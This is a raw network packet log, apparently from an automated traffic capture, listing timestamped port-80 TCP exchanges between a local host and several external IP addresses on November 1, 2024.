                                                                                        Nov 1, 2024 19:43:46.096385956 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096396923 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096399069 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.096440077 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.096440077 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097115040 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097126007 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097135067 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097184896 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097266912 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097278118 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097290039 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097300053 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097317934 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097351074 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097769976 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097779989 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097790956 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097803116 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097815037 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097825050 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097826004 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097840071 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097850084 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097851992 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097852945 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097876072 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.098442078 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098500967 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.098556042 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098567009 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098576069 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098587036 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098598957 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098608971 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.098609924 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098623037 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098649025 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.098680019 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.099543095 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099554062 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099565029 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099576950 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099587917 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099591970 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.099598885 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099611044 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099613905 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.099622965 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099636078 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.099666119 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.100244999 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.100295067 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.128068924 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128079891 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128091097 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128096104 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128099918 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128146887 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128170967 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128180027 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128256083 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.128293037 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.179018974 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.179037094 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.179042101 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.179203033 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219243050 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219254017 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219264030 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219338894 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219341040 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219348907 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219356060 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219396114 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219405890 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219408035 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219417095 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219429016 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219439030 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219440937 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219474077 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219914913 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219965935 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219976902 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219988108 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219997883 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220021009 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220067978 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220110893 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220140934 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220156908 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220169067 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220180035 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220191956 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220195055 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220221996 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220741987 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220793962 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220796108 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220805883 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220839977 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220899105 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220916033 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220927000 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220937967 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220949888 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220962048 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220962048 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220973969 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220976114 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221004009 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221009016 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221021891 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221052885 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221364975 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221385002 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221410990 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221441984 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221453905 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221462965 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221476078 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221487999 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221506119 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221509933 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221520901 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221532106 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221543074 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221549988 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221554041 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221566916 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221566916 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221590042 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221661091 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221704006 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222357035 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222372055 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222383022 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222413063 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222461939 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222471952 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222481966 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222492933 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222503901 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222511053 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222513914 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222527981 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222533941 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222537994 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222543955 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222551107 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222565889 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222598076 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.229043961 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.233822107 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:44:01.349040031 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:01.353950977 CET8049822188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:01.354062080 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:01.363862991 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:01.369484901 CET8049822188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:02.875030994 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:02.880579948 CET8049822188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:02.880750895 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:04.026787043 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:04.031725883 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:04.031816959 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:04.065896034 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:04.070780039 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.578167915 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775711060 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775784969 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775818110 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775832891 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775844097 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775856972 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775880098 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775912046 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775927067 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775927067 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.776304960 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.776351929 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.777925014 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.778074026 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:06.602042913 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:06.608103991 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.608177900 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:06.658864021 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:06.663814068 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663852930 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663863897 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663872004 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663887978 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663959980 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663971901 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663980007 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663984060 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:08.172209024 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:08.177539110 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:08.177592993 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:09.190468073 CET4986480192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:09.210165977 CET8049864188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:09.210247993 CET4986480192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:09.216675997 CET4986480192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:09.222237110 CET8049864188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:10.733464003 CET8049864188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:10.733572960 CET8049864188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:10.733838081 CET4986480192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:10.735894918 CET8049864188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:10.735994101 CET4986480192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:10.736845016 CET4986480192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:10.741647005 CET8049864188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:15.769454002 CET4990080192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:15.775434017 CET80499003.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:15.775561094 CET4990080192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:15.789380074 CET4990080192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:15.795358896 CET80499003.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:16.407594919 CET80499003.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:16.407691956 CET4990080192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:17.297024012 CET4990080192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:17.301795006 CET80499003.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:18.315464973 CET4991680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:18.320750952 CET80499163.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:18.320856094 CET4991680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:18.329583883 CET4991680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:18.334506035 CET80499163.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:18.981096983 CET80499163.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:18.981200933 CET4991680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:19.843853951 CET4991680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:19.849164963 CET80499163.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.862633944 CET4993280192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:20.867696047 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.867806911 CET4993280192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:20.879575014 CET4993280192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:20.884773970 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.884785891 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.884800911 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.884812117 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.884901047 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.884911060 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.884917974 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.884927988 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:20.884938002 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:21.525420904 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:21.525518894 CET4993280192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:22.390850067 CET4993280192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:22.395694017 CET80499323.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:23.410659075 CET4994680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:23.415544033 CET80499463.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:23.415647984 CET4994680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:23.425488949 CET4994680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:23.430567026 CET80499463.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:24.051904917 CET80499463.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:24.054126024 CET80499463.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:24.054210901 CET4994680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:24.055794954 CET4994680192.168.2.43.33.130.190
                                                                                        Nov 1, 2024 19:44:24.060766935 CET80499463.33.130.190192.168.2.4
                                                                                        Nov 1, 2024 19:44:29.485671043 CET4998180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:29.490618944 CET8049981154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:29.490717888 CET4998180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:29.501153946 CET4998180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:29.506160021 CET8049981154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:30.496536016 CET8049981154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:30.546886921 CET4998180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:30.691808939 CET8049981154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:30.691865921 CET4998180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:31.015794992 CET4998180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:32.034269094 CET4999680192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:32.040025949 CET8049996154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:32.040147066 CET4999680192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:32.050538063 CET4999680192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:32.056000948 CET8049996154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:33.057655096 CET8049996154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:33.109508038 CET4999680192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:33.246875048 CET8049996154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:33.246937037 CET4999680192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:33.562700033 CET4999680192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:34.581248999 CET5001180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:34.586412907 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.586532116 CET5001180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:34.597165108 CET5001180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:34.602266073 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.602277040 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.602286100 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.602353096 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.602364063 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.602371931 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.602610111 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.602619886 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:34.602631092 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:35.562186003 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:35.609510899 CET5001180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:35.745189905 CET8050011154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:35.745387077 CET5001180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:36.109568119 CET5001180192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:37.128351927 CET5001580192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:37.133378029 CET8050015154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:37.133481026 CET5001580192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:37.140327930 CET5001580192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:37.145212889 CET8050015154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:38.138628006 CET8050015154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:38.187485933 CET5001580192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:38.329555988 CET8050015154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:38.329719067 CET5001580192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:38.330574036 CET5001580192.168.2.4154.23.184.95
                                                                                        Nov 1, 2024 19:44:38.335336924 CET8050015154.23.184.95192.168.2.4
                                                                                        Nov 1, 2024 19:44:43.363389015 CET5001680192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:43.368328094 CET8050016172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:43.368402958 CET5001680192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:43.383128881 CET5001680192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:43.388273954 CET8050016172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:44.513079882 CET8050016172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:44.513092995 CET8050016172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:44.513284922 CET5001680192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:44.514652967 CET8050016172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:44.519840956 CET5001680192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:44.890825033 CET5001680192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:45.910425901 CET5001780192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:45.915400028 CET8050017172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:45.915488958 CET5001780192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:45.926578999 CET5001780192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:45.931813955 CET8050017172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:47.090326071 CET8050017172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:47.090347052 CET8050017172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:47.090485096 CET5001780192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:47.092034101 CET8050017172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:47.092134953 CET5001780192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:47.437572002 CET5001780192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:48.457772017 CET5001880192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:48.462780952 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.462929010 CET5001880192.168.2.4172.67.185.22
